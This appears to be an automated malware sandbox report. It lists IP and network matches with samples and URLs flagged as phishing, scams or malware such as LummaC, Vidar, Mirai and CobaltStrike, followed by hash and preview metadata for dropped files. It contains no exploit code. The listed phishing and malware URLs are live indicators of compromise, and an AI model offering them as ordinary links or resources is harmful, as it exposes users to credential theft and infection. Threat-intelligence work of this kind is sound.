http://www.sbh.co.uk/ | malicious | HTMLPhisher, TechSupportScam | 152.199.21.175
BGM LAW GROUP - RFP 2024.pdf | malicious | Unknown | 152.199.21.175
https://docs.google.com/presentation/d/e/2PACX-1vQdSuwONgWFnuoaK9jWkn4a4T1fFD4ixA3V2X7f5aWnD4sHxk2b10z2j2TMxkq3G15FQX3bbwReJ2PF/pub?start=false&loop=false&delayms=3000 | malicious | Unknown | 152.199.21.175
http://editableslides.co | malicious | HTMLPhisher, TechSupportScam | 152.199.21.175

Match: s-part-0035.t-0009.t-msedge.net
installer64v5.2.7.msi | malicious | Unknown | 13.107.246.63
installer64v3.2.6.msi | malicious | Unknown | 13.107.246.63
Tool_Unlock_v1.2.exe | malicious | Vidar | 13.107.246.63
http://track.rbfcu.org/y.z?l=https://google.com/amp/s/t.ly/5SpZS&r=14387614172&d=18473&p=2&t=h | malicious | HTMLPhisher | 13.107.246.63
l0zocrLiVW.exe | malicious | LummaC | 13.107.246.63
TdloJt4gY3.exe | malicious | LummaC | 13.107.246.63
QfBhv404w4.exe | malicious | Phorpiex | 13.107.246.63
726odELDs8.exe | malicious | LummaC | 13.107.246.63
YrWaRb0IKJ.exe | malicious | LummaC | 13.107.246.63
v5Evrl41VR.exe | malicious | LummaC | 13.107.246.63

Match: sni1gl.wpc.omegacdn.net
http://track.rbfcu.org/y.z?l=https://google.com/amp/s/t.ly/5SpZS&r=14387614172&d=18473&p=2&t=h | malicious | HTMLPhisher | 152.199.21.175
http://track.rbfcu.org/y.z?l=https://google.com/amp/s/t.ly/5SpZS&r=14387614172&d=18473&p=2&t=h | malicious | HTMLPhisher | 152.199.21.175
https://issuu.com/txbct.com/docs/navex_quote_65169.?fr=xKAE9_zU1NQ | malicious | HTMLPhisher | 152.199.21.175
Audio02837498.html | malicious | HTMLPhisher | 152.199.21.175
https://en.newsnowbangla.com/archives/69912 | malicious | HTMLPhisher, TechSupportScam | 152.199.21.175
https://flowto.it/8tooc2sec?fc=0 | malicious | Unknown | 152.199.21.175
vFile__0054seconds__Airborn.html | malicious | HTMLPhisher | 152.199.21.175
https://jkqbjwq.maxiite.com | malicious | HTMLPhisher | 152.199.21.175
Payout Receipts.pptx | malicious | HTMLPhisher | 152.199.21.175
Invoice for 04-09-24 fede39.admr.org.html | malicious | Unknown | 152.199.21.175

Match: api.company-target.com
https://docs.zoom.us/doc/amQMYMv8RzCj0FS5-u7_7w?from=email | malicious | Unknown | 13.227.8.6
http://www.earthcam.net/refer/refer.php?h=1&t=ai&a=MjAyNDEwVExPTQ==&u=http:%2f%2fhidroregjioni-jugor.com%2fdayo/QNMvj/ZGF2aWRidWxsQGFya2ZpbmFuY2lhbC5jb20= | malicious | Unknown | 108.158.75.78
http://demo.specialistbanking.co.uk/ad.PDF | malicious | Unknown | 108.158.75.7
https://atpscan.global.hornetsecurity.com/?d=zgarMAzqF8gJdiyz7BRUZX8-Kt1RoHrhrMmKtaU9kW8&f=VhLn9tqiibnSyqWDnEopjApZtye8WgAc5bwx7BMFWiKwqjA1EcPjZyfvoQy11klP&i=&k=QQhP&m=0jL9ajZ_jxYnMJb2yb4luNRYQCXy24RTS6RPwUyZoAcuBVX0kzGA69aOJSo0d2htwIsi238bOVH3h3HqrhJGfzTuFk7GTjJWYsgIrocXphf5x2p4nZ7S2EABjAck31fG&n=TU5FjsulXTMv8aeSlx257utLr9bUpfdm0dDB4GNEHfOuhOvtIOr62mZHw3PXGZeG&r=qntyoaxGftDLRu_wopiK2t_EdeZaeg9mP15ZZI-qDen_3s7cQ10pAlhKQQnYAIUX&s=c4a8f5ec353e41b8b414bdcf47b33dd5d6b52b0394e0e4a09cc54527f49761c3&u=https%3A%2F%2Fthe1oomisagency.com%2Fthyu%2F | malicious | Unknown | 18.66.102.75
Invitation Letter from Ministry of Defence China.html | malicious | HTMLPhisher | 18.66.102.127
https://us.services.docusign.net/webforms-ux/v1.0/forms/de9dbdc77cc2367bb50c45c4d2a0b8c4 | malicious | Unknown | 18.66.102.98
https://protect-us.mimecast.com/s/18vfCQWNWqS1V8BlCPhEHGoqRR | malicious | Unknown | 18.66.102.75
http://swctch.com | malicious | Unknown | 18.245.199.109
https://support-facebook.kb.help/your-facebook-account-has-been-restricted/ | malicious | HTMLPhisher | 18.66.102.75
Douglas County Government.pdf | malicious | Unknown | 18.66.102.85
Columns: Associated Sample Name / URL | Detection | Threat Name | Context

Match: EDGECASTUS
db0fa4b8db0333367e9bda3ab68b8042.i686.elf | malicious | Mirai, Gafgyt | 152.195.101.222
http://track.rbfcu.org/y.z?l=https://google.com/amp/s/t.ly/5SpZS&r=14387614172&d=18473&p=2&t=h | malicious | HTMLPhisher | 152.199.21.175
http://track.rbfcu.org/y.z?l=https://google.com/amp/s/t.ly/5SpZS&r=14387614172&d=18473&p=2&t=h | malicious | HTMLPhisher | 152.199.21.175
https://contractnerds.com/ | malicious | Unknown | 192.229.221.25
http://assets.website-files.com/65efffe8d4e10d26910f0543/65f65633ab8b2f021b357c18_64146967722.pdf | malicious | Unknown | 152.195.15.58
Audio02837498.html | malicious | HTMLPhisher | 152.199.21.175
https://en.newsnowbangla.com/archives/69912 | malicious | HTMLPhisher, TechSupportScam | 152.199.21.175
http://usps.com-trackilw.top/us | malicious | Unknown | 192.229.221.165
vFile__0054seconds__Airborn.html | malicious | HTMLPhisher | 152.199.21.175
http://northwesthousingservices.discussripped.com | malicious | HTMLPhisher | 152.199.19.160

Match: CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC
wyySetups64.exe | malicious | GhostRat | 149.129.12.34
V2clgnyM2J.exe | malicious | GhostRat | 8.218.163.85
test5.exe | malicious | CobaltStrike, Metasploit | 47.90.135.102
libcurl.dll | malicious | Matanbuchus | 47.254.174.185
EpCAySF1G6.exe | malicious | Unknown | 8.218.163.62
EpCAySF1G6.exe | malicious | Unknown | 8.218.163.62
                                                                                                                xd.ppc.elfGet hashmaliciousMiraiBrowse
                                                                                                                • 47.245.158.74
                                                                                                                loligang.mpsl.elfGet hashmaliciousMiraiBrowse
                                                                                                                • 47.57.184.195
                                                                                                                T1#U5b89#U88c5#U52a9#U624b1.0.2.exeGet hashmaliciousNitolBrowse
                                                                                                                • 8.212.102.187
                                                                                                                splarm7.elfGet hashmaliciousUnknownBrowse
                                                                                                                • 47.253.191.95
                                                                                                                No context
                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                C:\$Windows.~WS\Sources\DU.dll7bYDInO.rtfGet hashmaliciousUnknownBrowse
                                                                                                                  C:\$Windows.~WS\Sources\DiagTrack.dllMediaCreationTool.batGet hashmaliciousUnknownBrowse
                                                                                                                    7bYDInO.rtfGet hashmaliciousUnknownBrowse
                                                                                                                      Process:C:\$Windows.~WS\Sources\SetupHost.exe
                                                                                                                      File Type:Unicode text, UTF-8 (with BOM) text
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):1908
                                                                                                                      Entropy (8bit):4.874587641202385
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:24:5I5aVbJDP+tUI0X3AN0/1Cvf/g3vvQ/1Cv8Gh/1Cvze/g3vO/1CvVL/1CvR/g3v9:5MwiGI0P4GsfT/7eLy
                                                                                                                      MD5:D1E75542EC8D1B4851765A57AC63618E
                                                                                                                      SHA1:A231451F545D3133E5D6A0487A59C5DBD01EE50E
                                                                                                                      SHA-256:6C06BF950D0FE3476E020CD363EC0C8C9D4EE0FC89A24C50780C44E6453995C6
                                                                                                                      SHA-512:89D3C182833B97B0899ECD45DE1439F8341BF2EA11578E2085375A4DB3CC18FAD221998DC4B6F4407381D2134CB43D78025349DED1E50B6A4EEA5919B18B168C
                                                                                                                      Malicious:false
                                                                                                                      Preview:.<xml xmlns:s="uuid:BDC6E3F0-6DA3-11d1-A2A3-00AA00C14882". xmlns:dt="uuid:C2F41010-65B3-11d1-A29F-00AA00C14882". xmlns:rs="urn:schemas-microsoft-com:rowset". xmlns:z="#RowsetSchema">.<s:Schema id="RowsetSchema">.<s:ElementType name="row" content="eltOnly" rs:updatable="true">.<s:AttributeType name="Cls" rs:number="0">.<s:datatype dt:type="string"/>.</s:AttributeType>.<s:AttributeType name="Sev" rs:number="1">.<s:datatype dt:type="int"/>.</s:AttributeType>.<s:AttributeType name="Maj" rs:number="2">.<s:datatype dt:type="string"/>.</s:AttributeType>.<s:AttributeType name="Min" rs:number="3">.<s:datatype dt:type="string"/>.</s:AttributeType>.<s:AttributeType name="LN" rs:number="4">.<s:datatype dt:type="int"/>.</s:AttributeType>.<s:AttributeType name="Fil" rs:number="5">.<s:datatype dt:type="string"/>.</s:AttributeType>.<s:AttributeType name="Fun" rs:number="6">.<s:datatype dt:type="string"/>.</s:AttributeType>.<s:AttributeType name="Uid" rs:number="7">.<s:datatype dt:type="int"/>.</s:At
                                                                                                                      Process:C:\$Windows.~WS\Sources\SetupHost.exe
                                                                                                                      File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (375)
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):5021
                                                                                                                      Entropy (8bit):5.377084882345892
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:96:5MwiGdgbnE0jiecM40jiecq40jiecEG0jiecOGNaNG0yIGSSGStSDgGMVn61y:53gbELM4Lq4LEGLOGNQGWGhGSkDgGMxN
                                                                                                                      MD5:31374D761523E1F9182FA69ADDD707A8
                                                                                                                      SHA1:61BF403EB8FA026E8B877CAD570AD274F8C63610
                                                                                                                      SHA-256:3EAE7BD2992F9C2A24E3594761AD3F2AFD9A483FB3DCA26EE8BACD05FB1A269C
                                                                                                                      SHA-512:E5E6A9EB2C84EFF7D3C2AA0E6C35CA8508563F0917B98E0E9ED34462993A574D21322467A89647DCEB5E6FBFC23DC97F5CBA95917B998D309E12139D3F6E28E5
                                                                                                                      Malicious:false
                                                                                                                      Preview:.<xml xmlns:s="uuid:BDC6E3F0-6DA3-11d1-A2A3-00AA00C14882". xmlns:dt="uuid:C2F41010-65B3-11d1-A29F-00AA00C14882". xmlns:rs="urn:schemas-microsoft-com:rowset". xmlns:z="#RowsetSchema">.<s:Schema id="RowsetSchema">.<s:ElementType name="row" content="eltOnly" rs:updatable="true">.<s:AttributeType name="Cls" rs:number="0">.<s:datatype dt:type="string"/>.</s:AttributeType>.<s:AttributeType name="Sev" rs:number="1">.<s:datatype dt:type="int"/>.</s:AttributeType>.<s:AttributeType name="Maj" rs:number="2">.<s:datatype dt:type="string"/>.</s:AttributeType>.<s:AttributeType name="Min" rs:number="3">.<s:datatype dt:type="string"/>.</s:AttributeType>.<s:AttributeType name="LN" rs:number="4">.<s:datatype dt:type="int"/>.</s:AttributeType>.<s:AttributeType name="Fil" rs:number="5">.<s:datatype dt:type="string"/>.</s:AttributeType>.<s:AttributeType name="Fun" rs:number="6">.<s:datatype dt:type="string"/>.</s:AttributeType>.<s:AttributeType name="Uid" rs:number="7">.<s:datatype dt:type="int"/>.</s:At
                                                                                                                      Process:C:\$Windows.~WS\Sources\SetupHost.exe
                                                                                                                      File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):6467
                                                                                                                      Entropy (8bit):4.510943797224239
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:xdKS2W2PFam+r3CBcN5rBGzJDX0PPDXyZYqUFN+tDI2D2n02+C9NpTCrE2+:waT
                                                                                                                      MD5:AD3F6E5114DA9B17C7291AC68ED5AEDC
                                                                                                                      SHA1:0223FFCC393FEC36546DC5A25255920967E9D9B1
                                                                                                                      SHA-256:77D5E5F06B523859A04D78836A6511C7222F49B6397C8E66B529005E64815177
                                                                                                                      SHA-512:0B0FC11C94874130E436814C507BEB3B0CF3A7AF1982DC1FD0C6718A258C620955AE36F139019B69BA7654231AE9E9361AE05CEBB6692D202EE0F3FB2555B327
                                                                                                                      Malicious:false
                                                                                                                      Preview:.2024-12-29 07:39:09, Info SP CSetupPlatform::Initialize: Setup log starts:..2024-12-29 07:39:09, Info SP SEH: Enter CExceptionHandler::CExceptionHandler..2024-12-29 07:39:09, Info SP SEH: Exit CExceptionHandler::CExceptionHandler..2024-12-29 07:39:09, Info SP Host system information:.. VM: NO.. Firmware type: UEFI.. Manufacturer: r bx DzpCuuK6vk.. Model : 19c2 4LH.. BIOS name : VMW201.00V.20829224.B64.2211211842.. BIOS version : P1MFK.. BIOS release date : 20221121000000.000000+000.. Total memory : 8589934592.. Number of physical CPUs : 2.. Number of logical CPUs : 2
                                                                                                                      Process:C:\Users\user\AppData\LineInst.exe
                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):123712
                                                                                                                      Entropy (8bit):6.460431067934838
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3072:7UTZhzH2+F3yOme7PNWCsWlMzeNDz7biF4jL4hgXE:GbF13PACNlDzS4Cn
                                                                                                                      MD5:7727A405C9878C2FE052922C1F965384
                                                                                                                      SHA1:12EF6479A97C7A6574CA8DD7BE6B64F47B79F710
                                                                                                                      SHA-256:4912ABC0A250DFAF63A48E4165E94AB701505F14BCC7A1464D5588FA2D434564
                                                                                                                      SHA-512:55C1A07BC932C619B585E3B883EAF581F5A0C5C8ED0AB1D1D0386DD344501746420D2541F0CD3CAFF984472AB65B8A7D49F5FD8821F45E5C4FA7194DDB89E09E
                                                                                                                      Malicious:false
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                      Joe Sandbox View:
                                                                                                                      • Filename: 7bYDInO.rtf, Detection: malicious, Browse
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......3..#wd}pwd}pwd}pc.~qud}pc.yqfd}pwd|p.d}pc.|qbd}pc.xq.d}pc.}qvd}pc.tqld}pc..pvd}pc..qvd}pRichwd}p........................PE..L....u.............!.........D.......j...............................................;....@A........................ ...................................@!..........0...T...............................@.......................@....................text....~.......................... ..`.data...............................@....idata..z...........................@..@.didat..............................@....rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................
                                                                                                                      Process:C:\Users\user\AppData\LineInst.exe
                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):922976
                                                                                                                      Entropy (8bit):6.46965241570797
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:12288:Er+9jUr2TTWLQRPwMRlf+8Kh+fx6gmkwJKdMrtUIHkaMNUEP3g5Qy1Jxb3ArS:A+9jUr2TTr5LlfcwwggUhnNzg5Rbwr
                                                                                                                      MD5:6C3F6A6BC5EDE978E9DFE1ACCE386339
                                                                                                                      SHA1:3B7B51D762C593E92123F9365A896ED64EE26A7A
                                                                                                                      SHA-256:B55D66F2943F1C63EA9B39DAE88AA2A4F91775CEFFFEFD263BD302866A7BD91C
                                                                                                                      SHA-512:3F87064354A0F55F36AA272C5918D208B8A77FFFB7965E9B50727C06FD8D8DB5E6695636A7DB37926FE444C91E4A4A7DC892EF5EF57676BA9515216D5E5F94FF
                                                                                                                      Malicious:false
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                      Joe Sandbox View:
                                                                                                                      • Filename: MediaCreationTool.bat, Detection: malicious, Browse
                                                                                                                      • Filename: 7bYDInO.rtf, Detection: malicious, Browse
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......b...&..&..&..J..*..&....J.....J..(..J..(..J..'..J.....J..'..J..'..Rich&..........................PE..L.....2V...........-.........d...............................................P......D.....@A........................ ...]...`...@.......p...............`!..........N..8...........................HO..@...............\.......@....................text...}........................... ..`.data...............................@....idata...&.......(..................@..@.didat.. ...........................@....rsrc...p...........................@..@.reloc..............`..............@..B........................................................................................................................................................................................................................................................................
                                                                                                                      Process:C:\Users\user\AppData\LineInst.exe
                                                                                                                      File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):79040
                                                                                                                      Entropy (8bit):5.68085764397868
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:1536:ctlKhKIqVXrOLgef8j1D8KxLQgSSQlsJkGAsC:SlYKrOMso1D8KxLQgSdKJMsC
                                                                                                                      MD5:76F30A1E149792D2542A253B920CBEF6
                                                                                                                      SHA1:9040E0873DF5CC2A64B850D1B8159B77528BA62C
                                                                                                                      SHA-256:488CBC8330952DD13B797BB40E4E30610ED03483C25919C39555F7B334A3C159
                                                                                                                      SHA-512:EC39861A3F39F88AAD52975974C988AE76376A09136D95F5D4FEDD60EE7EC252736D882CEF77298D82D786E0DAD13C61148B29D7C5FB7BA7D7C74B05DE9D7E84
                                                                                                                      Malicious:false
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........S...S...S....-%.P....-&.F....-'.U....-;.X...S........-#.R....-9.R....-$.R...RichS...................PE..L...Y.2V.................V...........U.......p....@..........................0......M.....@.................................,...x........................<... .......#..8............................$..@...............(............................text...0U.......V.................. ..`.data........p.......Z..............@....idata...............\..............@..@.rsrc................d..............@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................
                                                                                                                      Process:C:\Users\user\AppData\LineInst.exe
                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):41792
                                                                                                                      Entropy (8bit):6.371638869251201
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:768:GjGabdDxVfFrX8khxIWdOghUak3h1PQRVta:G9dDxNFrX80IWdOdaeXP4ta
                                                                                                                      MD5:4396BDD1707419909F04A92184AD1317
                                                                                                                      SHA1:EAA238531420DCFBDB864FA31BD95373B53977D7
                                                                                                                      SHA-256:AE0F8123D3EF8801961211D7D71780BEE76C418EBC8C6893B385D5FABA6BB68F
                                                                                                                      SHA-512:D7E526A1BB8B7D4FB91DE5F10DD1CD1A005DD26AEC7839B22E66303BADA8ECBA34E92F2467EA510584C29C93C51A78C4FA36849050F72BFEDA456671136AA8EC
                                                                                                                      Malicious:false
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......h.Z.,.4.,.4.,.4.8.7...4.8.0.".4.,.5...4.8.5.#.4.8.1.).4.8.4.-.4.8.=.%.4.8..-.4.8.6.-.4.Rich,.4.........................PE..L...E9.I...........!.....^...".......X.......p............................................@A.........................e......P...........................@!...........$..T...............................@...............L....d..@....................text...j\.......^.................. ..`.data........p.......b..............@....idata...............d..............@..@.didat...............t..............@....rsrc................v..............@..@.reloc...............z..............@..B........................................................................................................................................................................................................................................................................
                                                                                                                      Process:C:\Users\user\AppData\LineInst.exe
                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):15634744
                                                                                                                      Entropy (8bit):2.7509316397129315
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:12288:mzKrn9w8KDsQ/z20NoJDZVm4z0VdwmTRjnaQbjAKz7h8n5Ou:AK+8KQ820aXVdz0VdwmTRjamPh8n5L
                                                                                                                      MD5:BDBD14F60FC78EDCA16A022C9801CF70
                                                                                                                      SHA1:E24CE3852CC9D42296C3FD550735069B86D7518A
                                                                                                                      SHA-256:A2679D717DB07F43D81F895E508520E01CD0262F1BE5870333D12CE71FE02DB4
                                                                                                                      SHA-512:6D6AA6AA8108D49347B4D5B40C632E568D44805D6352B517363262A408F7E04CAFB3A66D1CB121BF920DF080C7119401C454F90BA9A47FFE593CE9CB11DA78B8
                                                                                                                      Malicious:false
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........*.2;Kja;Kja;Kja/ i`=Kja/ n`-Kja/ k`.Kja;Kka.Ija/ o`0Kja/ j`:Kja/ c`^Kja/ .a:Kja/ h`:KjaRich;Kja........................PE..L................-.........T..............0.......................................%....@A........................P&..X.......h.......L............p..8!...@..........T...........................p...@............................................text............................... ..`.data...tK...0...&..................@....idata...#.......$...B..............@..@.rsrc................f..............@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................
                                                                                                                      Process:C:\$Windows.~WS\Sources\SetupHost.exe
                                                                                                                      File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):262144
                                                                                                                      Entropy (8bit):4.647786492863431
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:1536:sT9Ps8LkRAdnz0g2qnCcuwXiSjwJ7RSnhkcA9Zs5uu3lQ:sVwzgF
                                                                                                                      MD5:535FA80FA78584C5490B8820F7B093BF
                                                                                                                      SHA1:41CDC82F1E6E7DC1AC468011B4651341DF8276C8
                                                                                                                      SHA-256:E023F0A07CC39DFB37FE89A32CFA36C7721624D6857FD6406B4FE508A749C8D7
                                                                                                                      SHA-512:6D59B1B2808B939AD101BE08DA7662FE0B5DC8F254C197577FCF50F390FE75A15A5206458627787BE697D09528C5BB3676807067FCCC36DC1810085BBE057024
                                                                                                                      Malicious:false
                                                                                                                      Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc1\adeff40\deff0\stshfdbch11\stshfloch0\stshfhich0\stshfbi0\deflang1033\deflangfe1033\themelang1033\themelangfe2052\themelangcs1025{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\f2\fbidi \fmodern\fcharset0\fprq1{\*\panose 02070309020205020404}Courier New;}{\f3\fbidi \froman\fcharset2\fprq2{\*\panose 05050102010706020507}Symbol;}{\f10\fbidi \fnil\fcharset2\fprq2{\*\panose 05000000000000000000}Wingdings;}..{\f11\fbidi \froman\fcharset128\fprq1{\*\panose 02020609040205080304}MS Mincho{\*\falt \'82\'6c\'82\'72 \'96\'be\'92\'a9};}{\f34\fbidi \froman\fcharset1\fprq2{\*\panose 02040503050406030204}Cambria Math;}..{\f40\fbidi \fswiss\fcharset0\fprq2{\*\panose 00000000000000000000}Tahoma;}{\f41\fbidi \fswiss\fcharset0\fprq2{\*\panose 020b0603020202020204}Trebuchet MS;}{\f43\fbidi \froman\fcharset128\fprq1{\*\panose 02020609040205080304}@MS Mincho;}..{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02
                                                                                                                      Process:C:\$Windows.~WS\Sources\SetupHost.exe
                                                                                                                      File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (501), with CRLF, LF line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):65536
                                                                                                                      Entropy (8bit):0.5384181033686862
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:48:5MwiGI0P4GsfT/7YQPoBQWEA49Q2eeYz:5MwiGdgbnHP3WEKle
                                                                                                                      MD5:2DBBAAB374BD7C3B7B5DAD4ACD397099
                                                                                                                      SHA1:1C9D614446A544A5E460C6C510C2BEB2F110A2E1
                                                                                                                      SHA-256:5728B7A1C143DB1AB8862D91772062B5FB55196DD32AFCBB69676CA452E70E73
                                                                                                                      SHA-512:A03B8E39C43F7D61377A1BE45172784B049A9FE6FE4B43B64D1E9E920747DB60F68E4615AE484D8B5DDCE5CC8DE2323BB13A78D99864F945AD7AFE7793E59FF5
                                                                                                                      Malicious:false
                                                                                                                      Preview:.<xml xmlns:s="uuid:BDC6E3F0-6DA3-11d1-A2A3-00AA00C14882". xmlns:dt="uuid:C2F41010-65B3-11d1-A29F-00AA00C14882". xmlns:rs="urn:schemas-microsoft-com:rowset". xmlns:z="#RowsetSchema">.<s:Schema id="RowsetSchema">.<s:ElementType name="row" content="eltOnly" rs:updatable="true">.<s:AttributeType name="Cls" rs:number="0">.<s:datatype dt:type="string"/>.</s:AttributeType>.<s:AttributeType name="Sev" rs:number="1">.<s:datatype dt:type="int"/>.</s:AttributeType>.<s:AttributeType name="Maj" rs:number="2">.<s:datatype dt:type="string"/>.</s:AttributeType>.<s:AttributeType name="Min" rs:number="3">.<s:datatype dt:type="string"/>.</s:AttributeType>.<s:AttributeType name="LN" rs:number="4">.<s:datatype dt:type="int"/>.</s:AttributeType>.<s:AttributeType name="Fil" rs:number="5">.<s:datatype dt:type="string"/>.</s:AttributeType>.<s:AttributeType name="Fun" rs:number="6">.<s:datatype dt:type="string"/>.</s:AttributeType>.<s:AttributeType name="Uid" rs:number="7">.<s:datatype dt:type="int"/>.</s:At
                                                                                                                      Process:C:\$Windows.~WS\Sources\SetupHost.exe
                                                                                                                      File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (333)
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):65536
                                                                                                                      Entropy (8bit):1.0397151326188603
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:53gbEPnmPZkPSsPMPSuiPSfiPSsiPSDPS6PSoPSp4PSl4PSk4PSFxPW:53IcsDv8I7CPs
                                                                                                                      MD5:65CBE3A3C9F4FDDA30F14207DABBE4AB
                                                                                                                      SHA1:AF98FBF840A02BFB362133BD897CF33E8E20FA4A
                                                                                                                      SHA-256:3F78A56586E5CEF0FCC78ACA56840CE9212305FC5E69C6BB8A6247D6EDA3909C
                                                                                                                      SHA-512:E1A9136AEAC4087D0F49814ECE575349CD8D630C1989E3E6ABD094A183ABC9DBA94FA8747EC6FD78AF9F008707CBE715411F0EC7B7D2E3AE7B6537945848B28F
                                                                                                                      Malicious:false
                                                                                                                      Preview:.<xml xmlns:s="uuid:BDC6E3F0-6DA3-11d1-A2A3-00AA00C14882". xmlns:dt="uuid:C2F41010-65B3-11d1-A29F-00AA00C14882". xmlns:rs="urn:schemas-microsoft-com:rowset". xmlns:z="#RowsetSchema">.<s:Schema id="RowsetSchema">.<s:ElementType name="row" content="eltOnly" rs:updatable="true">.<s:AttributeType name="Cls" rs:number="0">.<s:datatype dt:type="string"/>.</s:AttributeType>.<s:AttributeType name="Sev" rs:number="1">.<s:datatype dt:type="int"/>.</s:AttributeType>.<s:AttributeType name="Maj" rs:number="2">.<s:datatype dt:type="string"/>.</s:AttributeType>.<s:AttributeType name="Min" rs:number="3">.<s:datatype dt:type="string"/>.</s:AttributeType>.<s:AttributeType name="LN" rs:number="4">.<s:datatype dt:type="int"/>.</s:AttributeType>.<s:AttributeType name="Fil" rs:number="5">.<s:datatype dt:type="string"/>.</s:AttributeType>.<s:AttributeType name="Fun" rs:number="6">.<s:datatype dt:type="string"/>.</s:AttributeType>.<s:AttributeType name="Uid" rs:number="7">.<s:datatype dt:type="int"/>.</s:At
                                                                                                                      Process:C:\$Windows.~WS\Sources\SetupHost.exe
                                                                                                                      File Type:data
                                                                                                                      Category:modified
                                                                                                                      Size (bytes):65536
                                                                                                                      Entropy (8bit):3.271359157886994
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:xEHaHsH5HbH+HtHkHHHuHj0Hg3n1Iv3D5yzYfkueJ4taM40L45c+Bs+2qEJ/22jk:DFv6DiF0OB5n//uGAqh6PWqyfbL
                                                                                                                      MD5:2C6E01D357C17C5A8D5CDB5CE8BDBC2E
                                                                                                                      SHA1:721430F29ECC56B790FDAAD366F4882A3167C4B9
                                                                                                                      SHA-256:815F84D798E015D5AC8F245009FB0A0B859B085A2F4B00815952477B194E3D28
                                                                                                                      SHA-512:692778C56B424F4338C918BE396EC250F36447FA1538B981109DF74191FC532C4730EC5FC7D75CFB0125353690E1BD43D42EC5E486FBFAD9C07C1D45F27B275B
                                                                                                                      Malicious:false
                                                                                                                      Preview:.2024-12-29 07:39:08, Info MOUPG *************** SetupHost Logging Begin ***************..2024-12-29 07:39:08, Info MOUPG SetupHost::Initialize..2024-12-29 07:39:08, Info MOUPG SetupHost::Initialize: ModulePath = [C:\$Windows.~WS\Sources]..2024-12-29 07:39:08, Info MOUPG SetupHost::Initialize: WorkingPath = [C:\$Windows.~WS\Sources]..2024-12-29 07:39:08, Info MOUPG SetupHost::Initialize: LoggingPath = [C:\$Windows.~WS\Sources\Panther]..2024-12-29 07:39:08, Info MOUPG SetupHost::Initialize: MediaPath = []..2024-12-29 07:39:08, Info MOUPG SetupHost::Initialize: InstallFilePath = []..2024-12-29 07:39:08, Info MOUPG SetupHost::Initialize: ActionListFilePath = []..2024-12-29 07:39:08, Info MOUPG SetupHost::Initialize: CmdLine = [/Download /Web ]..2024-12-29
                                                                                                                      Process:C:\$Windows.~WS\Sources\SetupHost.exe
                                                                                                                      File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (304), with CRLF line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):689
                                                                                                                      Entropy (8bit):5.3565252498748235
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:12:EEcOvojERGu6aXth+IjiGKA2BWWBXRtFGaERGu6aXTE/g/eeDMcaHc2JxRnpf5r1:EEc+ojEMu/EA4REMuH2g/eeYcOrjp
                                                                                                                      MD5:63C270AABD0EF7161F6A499777F72E43
                                                                                                                      SHA1:8CDF227D415EC83FC01AD565C1E8C98C15EE075C
                                                                                                                      SHA-256:ED6AC99A88A3F809D52BD08221DAA4DA7BB1C4476760B7F1C54CB91B07213BDB
                                                                                                                      SHA-512:D2775457DB7DFD9E8CACA6DB340801DA72222EF83223CDAE812F3B4F4CBB4C618779BEB386FCF9F11B762093344D0042592AEF130B2F16B7A8AFED64FC0437D2
